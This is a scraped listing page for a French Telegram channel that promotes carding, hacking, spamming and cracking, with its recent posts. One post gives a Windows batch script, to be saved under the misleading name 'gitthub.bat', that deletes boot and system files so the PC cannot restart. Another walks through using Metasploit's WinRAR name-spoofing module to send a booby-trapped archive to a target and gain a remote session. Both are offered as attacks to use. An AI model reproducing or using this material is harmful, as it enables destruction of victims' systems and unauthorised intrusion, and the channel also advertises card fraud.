Get Mystery Box with random crypto!

ČYBER DIVISION ™

Logo de la chaîne télégraphique cyber_divisions - ČYBER DIVISION ™ Č
Logo de la chaîne télégraphique cyber_divisions - ČYBER DIVISION ™
Adresse du canal : @cyber_divisions
Catégories: Faits et chiffres
Langue: Français
Abonnés: 911
Description de la chaîne

Nous ferons de vous des élites de demain
Cyber division Africa
👉 Carding
👉 Hacking
👉 Spamming
👉 Dumping
👉 Cracking
👉Btc
https://t.me/joinchat/AAAAAEeJUIw9zrHizZrAAg

Ratings & Reviews

3.00

2 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

1

4 stars

0

3 stars

0

2 stars

0

1 stars

1


Les derniers messages 8

2021-09-09 08:30:05 Comment planter un PC pour toujours

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Ouvrez le bloc-notes et copier-coller ce texte. Enregistrez-le comme gitthub.bat
Cela devrait arrêter l'ordinateur une fois et supprimer les fichiers nécessaires pour redémarrer

Note Remarque: - Ne cliquez pas sur ce fichier.

Partagez et soutenez-nous
22 viewsSeb, 05:30
Ouvert / Commentaire
2021-09-09 08:18:06 Je vais vous donner une commande de débutant mais j’espère que vous n’allez jamais l’exécuter sur la machine de quelqu’un ou sur votre propre machine car je ne serai en aucuns cas responsable de vos actes.
19 viewsSeb, 05:18
Ouvert / Commentaire
2021-09-09 08:14:06 Salut ici , comment allez vous ?
19 viewsSeb, 05:14
Ouvert / Commentaire
2021-09-07 23:37:47 Comment pirater un système Windows à l’aide d’une archive Zip ?

Dans ce tutoriel, nous verrons comment prendre le contrôle d’un système Windows grâce à une archive Zip.
Pour réaliser cette expérience, nous utiliserons un module de Metasploit: Winrar_name_spoofing.
Ce module abuse une vulnérabilité découverte dans le logiciel de compression de fichier WinRar. Cette vulnérabilité permet notamment aux pirates de spoofer le nom d’un fichier (et son extension ) contenu dans une archive.

Tout d’abord lancez le service Postgresql, puis la plateforme Metasploit.

service postgesql start
msfconsole

Lancez le module Winrar_name_spoofing.

Ensuite, réglez les paramètres requis pour la création du fichier comme l’image ci-dessous, et lancez l’exploit. Vous trouverez le fichier généré dans le dossier /root/.msf4/local.

Dans le même shell, lancez le module multi/handler, réglez les options LPORT et LHOST, puis lancez l’exploit:

Trouvez une méthode pour faire parvenir le fichier sur le système ciblé.

Si l’utilisateur de ce système ouvre le dossier compressé avec WinRAR, il ne verra qu’un simple fichier texte.

Aussitôt qu’il cliquera sur le fichier, vous aurez accès à son système:

conseil

Prenez le soin de toujours scanner avec des antivirus ou des services onlines les dossiers compressés téléchargés sur la Toile (surtout ceux provenant des sites douteux)
31 viewsSeb, 20:37
Ouvert / Commentaire
2021-09-07 10:20:40
7 viewsCyber Gosht, 07:20
Ouvert / Commentaire